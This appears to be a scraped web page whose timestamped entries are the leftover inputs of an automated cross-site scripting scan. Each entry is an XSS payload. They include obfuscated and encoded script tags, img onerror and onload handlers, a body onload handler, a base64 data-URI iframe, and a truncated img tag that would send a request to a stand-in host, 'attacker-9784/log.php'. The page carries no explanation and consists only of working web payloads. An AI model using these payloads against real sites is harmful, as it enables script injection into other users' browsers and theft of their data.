 • pHqghUme\u003CScRiPt\D62f(9680)\u003C/sCripT\u003E

  2021-05-06 02:49:26


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%44%36%32%66%289044%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 02:49:10


  1


 • pHqghUme<img/src=">" onerror=alert(9403)>

  2021-05-06 02:48:56


  1


 • pHqghUme<img src=xyz OnErRor=D62f(9716)>

  2021-05-06 02:48:43


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=D62f(9691)>

  2021-05-06 02:48:30


  1


 • pHqghUme<body onload=D62f(9266)>

  2021-05-06 02:48:18


  1


 • pHqghUme

  2021-05-06 02:48:14


  1<hAhClX<


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9570'>

  2021-05-06 02:48:05


  1


 • pHqghUme

  2021-05-06 02:47:58


  1<img sRc='http://attacker-9784/log.php?


 • pHqghUme<isindex type=image src=1 onerror=D62f(9618)>

  2021-05-06 02:47:43


  1


 • pHqghUme

  2021-05-06 02:47:27


  1<ImTAYT x=9837>